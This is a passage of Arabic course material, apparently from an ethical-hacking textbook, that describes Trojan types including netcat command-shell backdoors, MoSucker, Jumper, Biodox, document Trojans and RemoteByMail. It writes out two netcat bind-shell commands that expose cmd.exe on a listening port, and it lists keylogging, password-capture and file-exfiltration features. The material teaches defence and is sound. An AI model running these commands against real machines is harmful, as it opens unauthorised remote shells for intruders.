‫ﺗﺗوﻓر أﻧواع ﻣﺧﺗﻠﻔﺔ ﻣن أﺣﺻﻧﺔ طروادة اﻟﺗﻲ ﺗﮭدف ﻷﻏراض ﻣﺧﺗﻠﻔﺔ‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﻗﺎﺋﻣﺔ ﺑﺄﻧواع أﺣﺻﻧﺔ طروادة‪:‬‬
‫‪Command Shell Trojans‬‬
‫‪ Command shell Trojan‬ﯾﻌطﻲ ﺟﮭﺎز اﻟﺗﺣﻛم ﻋن ﺑﻌد ﻟﻘذﯾﻔﺔ اﻷواﻣر )‪ (command shell‬ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪ .‬ﯾﺗم ﺗﺛﺑﯾت ﺧﺎدم‬
‫طروادة )‪ (Trojan server‬ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪ ،‬واﻟذي ﯾﻔﺗﺢ ﻣﻧﻔذ ﻻﺗﺻﺎل اﻟﻣﮭﺎﺟﻣﯾن‪ .‬ﯾﺗم ﺗﺛﺑﯾت ‪ Trojan client‬ﻋﻠﻰ ﺟﮭﺎز اﻟﻣﮭﺎﺟم‪،‬‬
‫واﻟذي ﯾﺳﺗﺧدم ﻟﺗﺷﻐﯾل ﻗذﯾﻔﺔ اﻷواﻣر )‪ (command shell‬ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪.‬‬

‫‪508‬‬
‫‪Command Shell Trojan: Netcat‬‬
‫ﺑﺎﺳﺗﺧدام ‪ ،Netcat‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم إﻋداد ﻣﻧﻔذ أو ‪ Backdoor‬واﻟﺗﻲ ﻣن ﺷﺄﻧﮭﺎ أن ﺗﺳﻣﺢ ﻟﮫ ﺑﻌﻣل ‪ telnet‬إﻟﻰ ‪ .DOS shell‬ﻣﻊ ھذا اﻷﻣر‬
‫اﻟﺑﺳﯾط ]‪ ،[C:\>nc -L -p 5000 -t -e cmd.exe‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم ان ﯾرﺗﺑط ﺑﺎﻟﻣﻧﻔذ ‪ .5000‬ﻣﻊ ‪ ،Netcat‬ﯾﻣﻛن ﻟﻠﻣﺳﺗﺧدم إﻧﺷﺎء‬
‫اﻻﺗﺻﺎﻻت اﻟواردة أو اﻟﺻﺎدرة‪ TCP ،‬أو ‪ ،UDP‬إﻟﻰ أو ﻣن أي ﻣﻧﻔذ‪ .‬أﻧﮫ ﯾوﻓر ﻓﺣص ‪ DNS‬ﺑﺎﻟﻛﺎﻣل ﺳواء ‪ forward‬أو ‪ ،reverse‬ﻣﻊ‬
‫اﻟﺗﺣذﯾرات اﻟﻣﻧﺎﺳﺑﺔ‪ .‬ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك‪ ،‬ﻓﺈﻧﮫ ﯾوﻓر اﻟﻘدرة ﻋﻠﻰ اﺳﺗﺧدام أي ﻣﻧﻔذ ﻣﺻدر ﻣﺣﻠﻲ‪ ،‬أي ﻋﻧوان )‪ (Source address‬ﺷﺑﻛﺔ ﺗم‬
‫إﻋداداھﺎ ﻣﺣﻠﯾﺎ‪ ،‬وأﻧﮫ ﯾﺄﺗﻲ ﻣﻊ ﻗدرات ﻓﺣص اﻟﻣﻧﺎﻓذ اﻟﻣدﻣﺞ ﻓﯾﮭﺎ‪ .‬ﻟدﯾﮭﺎ أﯾﺿﺎ اﻟﻘدرة ﻋﻠﻰ ﺗوﺟﯾﮫ اﻟﻣﺻدر)‪ (source routing‬اﻟﻣدﻣﺟﺔ ﻓﯾﮭﺎ‬
‫وﯾﻣﻛﻧﮫ ﻗراءة ﻣﻌﺎﻣﻼت ﺳطر اﻷواﻣر ﻣن اﻹدﺧﺎل اﻟﻘﯾﺎﺳﻲ)‪ .(stdin‬ﻣﯾزة أﺧرى ھﻲ اﻟﻘدرة ﻋﻠﻰ اﻟﺳﻣﺎح ﻟﺑرﻧﺎﻣﺞ آﺧر ﺑﺎﻟرد ﻋﻠﻰ اﻻﺗﺻﺎﻻت‬
‫اﻟواردة‪.‬‬
‫أﺑﺳط اﺳﺗﺧدام‪ "nc host port" ،‬ﯾﻘوم ﺑﺈﻧﺷﺎء اﺗﺻﺎل ‪ TCP‬إﻟﻰ ﻣﻧﻔذ ﻣﻌﯾن ﻋﻠﻰ اﻟﻣﺿﯾف اﻟﮭدف‪ .‬ﺛم ﯾﺗم إرﺳﺎل اﻹدﺧﺎل اﻟﻘﯾﺎﺳﻲ إﻟﻰ‬
‫اﻟﻣﺿﯾف‪ ،‬وﯾﺗم إرﺳﺎل أي ﺷﻲء ﯾﻌود ﻋﺑر اﻻﺗﺻﺎل إﻟﻰ اﻹﺧراج اﻟﻘﯾﺎﺳﻲ‪ .‬وھذا ﯾﺳﺗﻣر إﻟﻰ أﺟل ﻏﯾر ﻣﺳﻣﻰ‪ ،‬ﺣﺗﻰ ﺗم اﻏﻼق ﻣن ﻗﺑل ﺟﺎﻧب‬
‫ﺷﺑﻛﺔ اﻻﺗﺻﺎل‪ .‬ھذا اﻟﺳﻠوك ﯾﺧﺗﻠف ﻋن ﻣﻌظم اﻟﺗطﺑﯾﻘﺎت اﻷﺧرى‪ ،‬اﻟﺗﻲ أﻏﻠﻘت ﻛل ﺷﻲء واﻟﺧروج ﺑﻌد ﻧﮭﺎﯾﺔ اﻟﻣﻠف ﻋﻠﻰ اﻟﻣدﺧﻼت اﻟﻘﯾﺎﺳﯾﺔ‪.‬‬
‫‪ Netcat‬ﯾﻣﻛن ان ﯾﻌﻣل أﯾﺿﺎ ﺑﻣﺛﺎﺑﺔ ﺧﺎدم ﻣن ﺧﻼل اﻻﺳﺗﻣﺎع ﻟﻼﺗﺻﺎﻻت اﻟواردة ﻋﻠﻰ اﻟﻣﻧﺎﻓذ اﻟﺗﻌﺳﻔﯾﺔ )‪ ، (arbitrary ports‬وﻣن ﺛم ﺗﻔﻌل‬
‫اﻟﻘراءة واﻟﻛﺗﺎﺑﺔ ﻧﻔﺳﮭﺎ‪ .‬ﻣﻊ اﻟﻘﯾود اﻟﺑﺳﯾطﺔ‪ Netcat ،‬ﻻ ﯾﮭﻣﻧﻲ ﺣﻘﺎ إذا ﻛﺎن ﯾﻌﻣل ﻓﻲ وﺿﻊ اﻟﺧﺎدم أو اﻟﻌﻣﯾل‪ ،‬ﺑل ﻻ ﯾزال ﯾﺣرك اﻟﺑﯾﺎﻧﺎت ذھﺎﺑﺎ‬
‫وإﯾﺎﺑﺎ ﺣﺗﻰ ﻻ ﯾﻛون ھﻧﺎك أي ﺷﻲء ﺗرك‪ .‬ﻓﻲ اﻟوﺿﻌﯾن‪ ،‬ﯾﻣﻛن أن ﯾﺟﺑر ﻋﻠﻰ اﻻﻏﻼق ﺑﻌد ﻓﺗرة ﻣن اﻟﺧﻣول ﻣن ﺟﺎﻧب اﻟﺷﺑﻛﺔ‪.‬‬
‫إﻧﺷﺎء اﻻﺗﺻﺎﻻت اﻟﺻﺎدرة أو اﻟواردة‪ TCP ،‬أو ‪ ،UDP‬إﻟﻰ أو ﻣن أي ﻣﻧﻔذ‪.‬‬ ‫‪-‬‬

‫ﻓﺣص ‪ DNS‬ﺑﺎﻟﻛﺎﻣل ﺳواء ‪ forward‬أو ‪ ،reverse‬ﻣﻊ اﻟﺗﺣذﯾرات اﻟﻣﻧﺎﺳﺑﺔ‪.‬‬ ‫‪-‬‬
‫اﻟﻘدرة ﻋﻠﻰ اﺳﺗﺧدام أي ﻣﻧﻔذ ﻣﺻدر ﻣﺣﻠﻲ‬ ‫‪-‬‬
‫اﻟﻘدرة ﻋﻠﻰ اﺳﺗﺧدام أي ﻋﻧوان ﺷﺑﻛﺔ اﻟﻣﺻدر)‪ (Network Source address‬اﻟﺗﻲ ﺗم ﺗﻛوﯾﻧﮭﺎ ﻣﺣﻠﯾﺎ‬ ‫‪-‬‬
‫اﻟﻘدرة ﻋﻠﻰ ﻓﺣص اﻟﻣﻧﺎﻓذ اﻟﻣدﻣﺟﺔ ﺑﮫ‪ ،‬ﻣﻊ اﻟﺗوزﯾﻊ ﺑﺷﻛل ﻋﺷواﺋﻲ)‪.(randomizer‬‬ ‫‪-‬‬
‫ﺗوﺟﯾﮫ اﻟﻣﺻدر)‪ (source routing‬اﻟﻣدﻣﺟﺔ ﻓﯾﮫ‬ ‫‪-‬‬
‫ﯾﻣﻛن ﻗراءة ﻣﻌﺎﻣﻼت ﺳطر اﻷواﻣر ﻣن اﻹدﺧﺎل اﻟﻘﯾﺎﺳﻲ‪.‬‬ ‫‪-‬‬
‫اﻟوﺿﻊ ‪ ،Slow-Send‬ﺳطر واﺣد ﻛل ‪ N‬ﺛﺎﻧﯾﺔ‪.‬‬ ‫‪-‬‬
‫‪ Hex dump‬ﻟﻠﺑﯾﺎﻧﺎت اﻟﻣرﺳﻠﺔ واﻟواردة‪.‬‬ ‫‪-‬‬
‫اﻟﻘدرة اﻻﺧﺗﯾﺎرﯾﺔ ﻟﻠﺳﻣﺎح ﻟﺧدﻣﺔ ﺑرﻧﺎﻣﺞ آﺧر ﻣن ﺗﺄﺳﯾس اﺗﺻﺎل‪.‬‬ ‫‪-‬‬
‫اﻟﻘدرة اﻻﺧﺗﯾﺎرﯾﺔ ‪ telnet-options‬ﺣﯾث ‪ responder‬ﯾﺳﺗﺧدم اﻷﻣر ]‪ [nc -l -p 23 -t -e cmd.exe‬ﺣﯾث ‪ 23‬ھو رﻗم اﻟﻣﻧﻔذ‬ ‫‪-‬‬
‫ل ‪ telnet‬واﻟﺧﯾﺎر ]‪ [-l‬ﻟﻼﺳﺗﻣﺎع‪ ،‬اﻟﺧﯾﺎر)‪ (-e‬ھو ﻟﻠﺗﻧﻔﯾذ‪ ،‬أﻣﺎ اﻟﺧﯾﺎر )‪ (-t‬ﯾﺧﺑر ‪ Netcat‬ﻟﻠﺗﻌﺎﻣل ﻣﻊ أﯾﺔ ﻣﻔﺎوﺿﺎت ﻟﻠﺗﻠﻧت اﻟﺗﻲ ﻗد‬
‫ﯾﺗوﻗﻌﮭﺎ اﻟﻌﻣﯾل‪.‬‬
‫‪ Netcat‬ھﻲ أداة ﺗﺳﺗﺧدم ﻟﻘراءة وﻛﺗﺎﺑﺔ اﻟﺷﺑﻛﺎت اﻟﺗﻲ ﺗدﻋم ﺑروﺗوﻛوﻻت ‪TCP‬و‪ .UDP‬ھو ﺗروﺟﺎن واﻟذي ﯾﺳﺗﺧدم ﻟﻔﺗﺢ ﻣﻧﺎﻓذ ‪ TCP‬أو‬
‫‪ UDP‬ﻋﻠﻰ اﻟﻧظﺎم اﻟﮭدف واﻟﻣﺗﺳﻠﻠﯾن ﺑﻣﺳﺎﻋدة ‪ telnet‬ﯾﻣﻛﻧﮭم ﻛﺳب اﻟوﺻول ﻋﺑر اﻟﻧظﺎم‪.‬‬

‫‪509‬‬
‫‪GUI Trojan‬‬
‫‪Gui Trojan: MoSucker‬‬

‫اﻟﻣﺻدر‪http://dark-e.com :‬‬
‫‪ MoSucker‬ھو ‪ MoSucker's edit server program .Visual Basic Trojan‬ﯾﺗﯾﺢ ﺗﻐﯾر روﺗﯾن اﻟﻌدوى وﺗﻌﯾن إﺧطﺎر‬
‫اﻟﻣﻌﻠوﻣﺎت‪ Mosucker .‬ﯾﻣﻛن أن ﯾﺣﻣل اﻟﯾﺎ ﻣﻊ ‪ system.ini‬و‪/‬أو رﺟﯾﺳﺗري‪ .‬ﻋﻠﻰ ﺧﻼف أي ﺗروﺟﺎن أﺧرى‪ Mosucker ،‬ﯾﻣﻛن ﺗﻌﯾﯾﻧﮫ‬
‫ﻻﺧﺗﯾﺎر اﻟطرﯾﻘﺔ اﻟﺗﻲ ﯾﺣﻣل ﺑﮭﺎ ﻋﺷواﺋﯾﺎ‪ .‬ﯾﻣﻛﻧﮫ ان ﯾﺧطر اﻟﮭواﺗف اﻟﻣﺣﻣوﻟﺔ ﻋﺑر اﻟرﺳﺎﺋل اﻟﻘﺻﯾرة ﻓﻲ أﻟﻣﺎﻧﯾﺎ ﻓﻘط‪.‬‬
‫‪ MoSucker's edit server program‬ﯾﻣﻛﻧﮫ اﻟﺣﺻول ﻋﻠﻰ ﻋدد ‪ X‬ﻣن اﻟﻛﯾﻠو ﺑﺎﯾت )‪ X‬ھو إﻣﺎ ﻋدد ﺛﺎﺑت أو ﻋﺷواﺋﻲ ﻓﻲ ﻛل ﻣرة(‪.‬‬
‫رﺳﺎﺋل اﻟﺧطﺄ اﻟﻣﻌﯾﺎرﯾﺔ ﻠﻠ ‪ Mosucker‬ھﻲ ﻛﺎﻻﺗﻰ‪:‬‬
‫‪(Zip file is damaged, truncated, or has been changed since it was created. If you downloaded this file,‬‬
‫)‪try downloading again‬‬
‫ھﻧﺎ ﻻﺋﺣﺔ ﺑﺄﺳﻣﺎء ﻣﻠﻔﺎت ‪ MoSucker‬واﻟﺗﻲ ﺗﺷﯾر إﻟﻰ اﺳم اﻟﺧﺎدم‪:‬‬
‫‪(MSNETCFG.exe, unino686.exe, Calc.exe, HTTP.exe, MSWlNUPD.exe, Ars.exe, NETUPDATE.exe,‬‬
‫)‪and Register.exe‬‬
‫اﻟﻣﻣﯾزات‪:‬‬
‫‪ -‬إﻣﻛﺎﻧﯾﺔ اﻟدردﺷﺔ ﻣﻊ اﻟﺿﺣﯾﺔ‬
‫‪ -‬إدارة ‪.Clipboard‬‬
‫‪ -‬إﻏﻼق‪/‬إزاﻟﺔ اﻟﺧﺎدم‬
‫‪ -‬اﻟﺳﯾطرة ﻋﻠﻰ اﻟﻣﺎوس‪.‬‬
‫‪ -‬إدارة ﻣﻠﻔﺎت ﺗﻠف اﻟﻧظﺎم )‪(Crash System File Manager‬‬
‫‪ -‬اﻟﺣﺻول ﻋﻠﻰ ﻛﻠﻣﺎت اﻟﺳر اﻟﺗﻲ ﺗم إدﺧﺎﻟﮭﺎ ﻣن ﻗﺑل اﻟﻣﺳﺗﺧدم‪ ،‬ﻣﻌﻠوﻣﺎت ﻋن اﻟﻧظﺎم‪.‬‬
‫‪ -‬إﺧﻔﺎء‪/‬إظﮭﺎر زر اﻟﺑداﯾﺔ)‪ ،system tray ، (Start Button‬ﺷرﯾط اﻟﻣﮭﺎم)‪(Taskbar‬‬
‫‪ -‬ﻛﻠوﻏر‬
‫‪ -‬ﺗﺻﻐﯾر ﻛﺎﻓﺔ اﻟﻧواﻓذ‬
‫‪ -‬ﻓﺗﺢ وﻏﻠﻖ ‪CD-ROM‬‬
‫‪ -‬ﺧﺎدم ‪ping‬‬
‫‪Pop-up start menu -‬‬
‫‪ -‬ﻣدﯾر ﻋﻣﻠﯾﺎت )‪(process manager‬‬
‫‪ -‬إﯾﻘﺎف‪/‬إﻋﺎدة اﻟﺗﺷﻐﯾل ‪ Logoff /standby/‬اﻟﺧﺎدم ﻓﻲ وﺿﻊ دوس‬
‫‪ -‬ﻣﻔﺎﺗﯾﺢ ﻧظﺎم ﺗﺷﻐﯾل‪/‬إﯾﻘﺎف‬
‫‪ -‬ﻣدﯾر اﻟﻧواﻓذ )‪(Window manager‬‬

‫‪510‬‬
‫‪GUI Trojan: Jumper and Biodox‬‬
‫‪ Jumper‬ھﻲ ﺑراﻣﺞ ﺧﺑﯾﺛﺔ و ﺿﺎرة واﻟﺗﻲ ﺗﻧﻔذ اﻟﻌدﯾد ﻣن اﻟﻣﮭﺎم ﻟﺗﺣﻣﯾل اﻟﺑراﻣﺞ اﻟﺿﺎرة اﻟﺧﺑﯾﺛﺔ ﻣن اﻹﻧﺗرﻧت‪ .‬اﻟﻣﮭﺎﺟﻣﯾن ﯾﺳﺗﺧدم‬
‫‪ Jumper Trojan‬ﻟﻠﺣﺻول ﻋﻠﻰ اﻟﺑﯾﺎﻧﺎت اﻟﺣﺳﺎﺳﺔ ﻣﺛل اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺎﻟﯾﺔ ﻣن ﻧظﺎم اﻟﻣﺳﺗﺧدم‪ .‬ﯾﻘوم أﯾﺿﺎ ﺑﺗﺣﻣﯾل ﺗﻧزﯾﻼت إﺿﺎﻓﯾﺔ ﺣﺗﻰ‬
‫ﯾﻛون اﻟﻣﮭﺎﺟﻣﯾن ﻗﺎدرﯾن ﻋﻠﻰ اﻟوﺻول إﻟﻰ اﻟﻧظﺎم ﻋن ﺑﻌد‪.‬‬
‫ﻋﻣوﻣﺎ‪ ،‬ﯾﺟب أن ﯾﻛون اﻟﻣﻠف ‪ BIODOX OE Edition.exe‬ﻓﻲ اﻟﻣﺟﻠد ‪C:\Windows\System32‬؛ إذا ﺗم اﻟﻌﺛور ﻋﻠﯾﮭﺎ ﻓﻲ أي‬
‫ﻣﻛﺎن آﺧر‪ ،‬ﻓﮭو ﺣﺻﺎن طروادة‪ .‬ﺑﻣﺟرد ﺣﺻول إﺻﺎﺑﺔ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻣن ﻗﺑل ‪ ،Biodox‬ﻓﺄﻧﮫ ﯾﻘﻠل ﻣن أداء اﻟﻧظﺎم‪ .‬ﯾﺣﺻل ﺗﻐﯾﯾر ﺷﺎﺷﺔ‬
‫اﻟﺗوﻗف ﺗﻠﻘﺎﺋﯾﺎ‪ .‬اﻹﻋﻼن اﻟﻣﺳﺗﻣر اﻟﻣزﻋﺞ اﻟﻧواﻓذ اﻟﻣﻧﺑﺛﻘﺔ اﻟﺗﻲ ﺗظﮭر ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﯾﻣﻛن أن ﺗﻌﺎﻣل ﻋﻠﻰ أﻧﮭﺎ واﺣدة ﻣن أﻋراض ھذا‬
‫اﻟﺗروﺟﺎن‪.‬‬
‫‪Document Trojans‬‬
‫ﻣﻌظم اﻟﻣﺳﺗﺧدﻣﯾن ﻋﺎدة ﻟدﯾﮭم ﻣﯾل ﻟﺗﺣدﯾث ﻧظﺎم اﻟﺗﺷﻐﯾل اﻟﺧﺎص ﺑﮭم وﻟﻛن ﻟﯾس اﻟﺗطﺑﯾﻘﺎت اﻟﺗﻲ ﯾﺳﺗﺧدﻣوﻧﮭﺎ ﺑﺎﻧﺗظﺎم‪ .‬اﻟﻣﮭﺎﺟﻣﯾن ﯾﻐﺗﻧﻣون ھذه‬
‫اﻟﻔرﺻﺔ ﻟﺗﺛﺑﯾت ﺣﺻﺎن طروادة اﻟوﺛﯾﻘﺔ)‪ . (Document Trojan‬اﻟﻣﮭﺎﺟﻣون ﻋﺎدة ﯾﻘوﻣون ﺑﺗﺿﻣﯾن طروادة ﻓﻲ وﺛﯾﻘﺔ ﺛم ﻧﻘﻠﮭﺎ اﻟﻰ اﻟﺿﺣﯾﺔ‬
‫ﻓﻲ ﺻورة ﻣرﻓﻖ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬وﺛﺎﺋﻖ اﻟﻣﻛﺗب)‪ ، (office documents‬ﺻﻔﺣﺎت اﻟوﯾب‪ ،‬أو ﻣﻠﻔﺎت اﻟوﺳﺎﺋط ﻣﺛل ﻓﻼش وﻣﻠﻔﺎت‬
‫‪ .PDF‬ﻋﻧدﻣﺎ ﯾﻔﺗﺢ اﻟﻣﺳﺗﺧدم اﻟوﺛﯾﻘﺔ اﻟﻣدﻣﺞ ﻣﻌﮭﺎ ﻣﻠف اﻟﺗروﺟﺎن ﻋﻠﻰ اﻓﺗراض أﻧﮫ ﻣﻠف ﺳﻠﯾم‪ ،‬ﯾﺗم ﺗﺛﺑﯾت طروادة ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪ .‬ھذا‬
‫‪ exploit‬اﻟﺗطﺑﯾﻖ اﻟﻣﺳﺗﺧدم ﻟﻔﺗﺢ اﻟﻣﺳﺗﻧد‪ .‬ﺛم ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن اﻟوﺻول إﻟﻰ اﻟﺑﯾﺎﻧﺎت اﻟﺣﺳﺎﺳﺔ وﺗﻧﻔﯾذ إﺟراءات ﺿﺎرة‪.‬‬

‫‪511‬‬
‫‪Email Trojans‬‬
‫‪ Email Trojans‬ﯾﻧﺗﺷر ﻋن طرﯾﻖ ‪ .bulk emails‬ﯾﺗم إرﺳﺎل ﻓﯾروﺳﺎت ﺣﺻﺎن طروادة ﻣن ﺧﻼل اﻟﻣرﻓﻘﺎت‪ .‬ﻟﺣظﺔ ﻗﯾﺎم اﻟﻣﺳﺗﺧدم ﺑﻔﺗﺢ‬
‫اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬ﯾدﺧل اﻟﻔﯾروس اﻟﻧظﺎم وﯾﻧﺗﺷر وﯾﺳﺑب اﻟﻛﺛﯾر ﻣن اﻷﺿرار اﻟﺗﻲ ﺗﻠﺣﻖ ﺑﺎﻟﺑﯾﺎﻧﺎت ﻓﻲ اﻟﻧظﺎم‪ .‬ﯾﻧﺻﺢ داﺋﻣﺎ اﻟﻣﺳﺗﺧدﻣﯾن ان ﻻ‬
‫ﯾﻘوﻣوا ﺑﻔﺗﺢ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻘﺎدﻣﺔ ﻣن اﻟﻣﺳﺗﺧدﻣﯾن اﻟﻐﯾر ﻣﻌروﻓﯾن ﺑﺎﻟﻧﺳﺑﺔ ﻟﮫ‪ .‬ﻓﻲ ﺑﻌض اﻷﺣﯾﺎن ‪ Email Trojans‬ﻗد ﺗوﻟد‬
‫رﺳﺎﻟﺔ ﺑرﯾد اﻟﻛﺗروﻧﻲ ﺗﻠﻘﺎﺋﯾﺎ وإرﺳﺎﻟﮭﺎ إﻟﻰ ﺟﻣﯾﻊ ﺟﮭﺎت اﻻﺗﺻﺎل اﻟﻣوﺟودة ﻓﻲ دﻓﺗر ﻋﻧﺎوﯾن اﻟﺿﺣﯾﺔ‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﯾﻧﺗﺷر ﻣن ﺧﻼل ﻗﺎﺋﻣﺔ اﺗﺻﺎل‬
‫اﻟﺿﺣﯾﺔ اﻟﻣﺻﺎﺑﺔ‪.‬‬
‫اﻟﻣﮭﺎﺟﻣون ﯾﻘوﻣون ﺑﺎرﺳﺎل ﺗﻌﻠﯾﻣﺎت ﻟﻠﺿﺣﯾﺔ ﻣن ﺧﻼل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ .‬ﻋﻧدﻣﺎ ﯾﻔﺗﺢ اﻟﺿﺣﯾﺔ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪ ،‬ﺳﯾﺗم ﺗﻧﻔﯾذ اﻟﺗﻌﻠﯾﻣﺎت ﺗﻠﻘﺎﺋﯾﺎ‪.‬‬
‫وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﯾﻣﻛن اﻟﻣﮭﺎﺟﻣﯾن ﻣن اﺳﺗرداد اﻟﻣﻠﻔﺎت أو اﻟﻣﺟﻠدات ﻋن طرﯾﻖ إرﺳﺎل اﻷواﻣر ﻋن طرﯾﻖ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ‪.‬‬
‫ﯾوﺿﺢ اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻛﯾف ﯾﻣﻛن ﺗﻧﻔﯾذ ھﺟوم ﺑﺎﺳﺗﺧدام ‪.Email Trojans‬‬
‫‪Email Trojans: RemoteByMail‬‬

‫ﯾﺳﺗﺧدم ‪ RemoteByMail‬ﻟﻠﺳﯾطرة واﻟوﺻول إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر‪ ،‬ﺑﻐض اﻟﻧظر ﻋن ﻣوﻗﻌﮫ‪ ،‬وﯾﺗم ذﻟك ﺑﺑﺳﺎطﺔ ﻋن طرﯾﻖ إرﺳﺎل اﻟﺑرﯾد‬
‫اﻹﻟﻛﺗروﻧﻲ‪ .‬ﻣﻊ أواﻣر ﺑﺳﯾطﺔ أرﺳﻠت ﻋن طرﯾﻖ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ إﻟﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر ﻓﻲ اﻟﻌﻣل أو ﻓﻲ اﻟﻣﻧزل‪ ،‬ﻓﺈﻧﮫ ﯾﻣﻛن ﺗﻧﻔﯾذ اﻟﻣﮭﺎم‬
‫اﻟﺗﺎﻟﯾﺔ‪:‬‬
‫‪ -‬ﯾﺳﺗرد ﻗﺎﺋﻣﺔ اﻟﻣﻠﻔﺎت واﻟﻣﺟﻠدات ﺑﺳﮭوﻟﺔ‪.‬‬
‫‪ -‬ﯾﻘوم ﺑﺿﻐط اﻟﻣﻠﻔﺎت ﺗﻠﻘﺎﺋﯾﺎ اﻟﺗﻲ ﺳﯾﺗم ﻧﻘﻠﮭﺎ‪.‬‬
‫‪ -‬ﯾﺳﺎﻋد ﻋﻠﻰ ﺗﻧﻔﯾذ اﻟﺑراﻣﺞ وﻣﻠﻔﺎت اﻟﺑﺎﺗش‪ ،‬أو ﻓﺗﺢ اﻟﻣﻠﻔﺎت‪.‬‬
‫ھذه ﺗﻌﺗﺑر أﺳﮭل وﺳﯾﻠﺔ ﻟﻠوﺻول إﻟﻰ اﻟﻣﻠﻔﺎت أو ﻟﺗﻧﻔﯾذ اﻟﺑراﻣﺞ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﻋن ﺑﻌد‪ .‬ﯾﻌرض ﻋﻠﻰ اﻟﺷﺎﺷﺔ اﻟرﺋﯾﺳﯾﺔ اﻟﻣﻌﻠوﻣﺎت أن اﻟﺑرﻧﺎﻣﺞ‬
‫ﻗد اﺳﺗﻘﺑﻠﮭﺎ وﻗﺎم ﺑﻣﻌﺎﻟﺟﺗﮭﺎ‪:‬‬
‫‪ :Start Server‬اﻧﻘر ﻓوق أﯾﻘوﻧﺔ ‪ Start Server‬ﻟﺑدء ‪ RemoteByMail‬ﻋﻣﻠﯾﺔ ﺗﻠﻘﻲ اﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ واﻟﻌﻣﻠﯾﺎت‪.‬‬
‫‪ :Stop‬اﻧﻘر ﻓوق أﯾﻘوﻧﺔ ‪ Stop‬ﻹﯾﻘﺎف اﻟﺗطﺑﯾﻖ ﻓﻲ أي وﻗت‪.‬‬
‫‪ :Check now‬ﻋرض ﻣﻌﻠوﻣﺎت اﻟﺑرﻧﺎﻣﺞ‪.‬‬
‫‪ :Listening to Accounts‬ﯾﻘوم ﺑﻌرض ﺣﺳﺎﺑﺎت وﻋﻧﺎوﯾن اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣرﺗﺑطﺔ‪.‬‬
‫‪ :Emails received‬ﯾﻌرض ﻗﺎﺋﻣﺔ اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﺗﻲ ﺗﺣﺗوي ﻋﻠﻰ اﻷواﻣر اﻟﺗﻲ ﯾﺗﻠﻘﺎھﺎ اﻟﺑرﻧﺎﻣﺞ‪.‬‬
‫‪ :Command queue‬ﯾﻌرض اﻷواﻣر اﻟﺗﻲ ﺗﻠﻘﺎھﺎ اﻟﺑرﻧﺎﻣﺞ وﻟﻛن ﻟم ﯾﺗم ﻣﻌﺎﻟﺟﺗﮭﺎ ﺣﺗﻰ اﻵن‬
‫‪ :Outgoing emails‬ﻓﺣص رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﻣﻌﺎﻟﺟﺔ‪.‬‬
‫‪ :Emails send‬ﯾﻌرض ﻗﺎﺋﻣﺔ رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﺗﻲ ﺗم ارﺳﺎﻟﮭﺎ ﻣن ﻗﺑل ‪.RemoteByMail‬‬
‫‪ RemoteByMail‬ﯾﻘﺑل وﯾﻧﻔذ اﻷواﻣر اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ :HI‬ﺗﺳﺗﺧدم ﻹرﺳﺎل اﻟﺑرﯾد اﻻﻟﻛﺗروﻧﻲ ﻣﻊ اﻟﻣﺣﺗوى "‪ "HI‬إﻟﻰ ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﺧﺎص ﺑك‪.‬‬
‫‪ :SEND‬ﯾرﺳل اﻟﻣﻠﻔﺎت اﻟﻣوﺟودة ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺿﯾف إﻟﻰ ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﺧﺎص ﺑك‪.‬‬

‫‪512‬‬
‫‪ :ZEND‬ﯾﻘوم ﺑﺿﻐط وﻣن ﺛم إرﺳﺎل اﻟﻣﻠﻔﺎت أو اﻟﻣﺟﻠدات اﻟﻣوﺟودة ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺿﯾف إﻟﻰ ﻋﻧوان اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ اﻟﺧﺎص ﺑك‪ .‬ﻟﻔﺗﺢ‬
‫اﻟﻣرﻓﻖ اﻟﻣﺿﻐوط ﺑﻌد ﺗﻠﻘﯾﮫ‪ ،‬أدﺧل ﻛﻠﻣﺔ اﻟﻣرور اﻟﺗﻲ اﺧﺗرﺗﮭﺎ ﻋﻧد إﻧﺷﺎء اﻟﺣﺳﺎب‪.‬‬
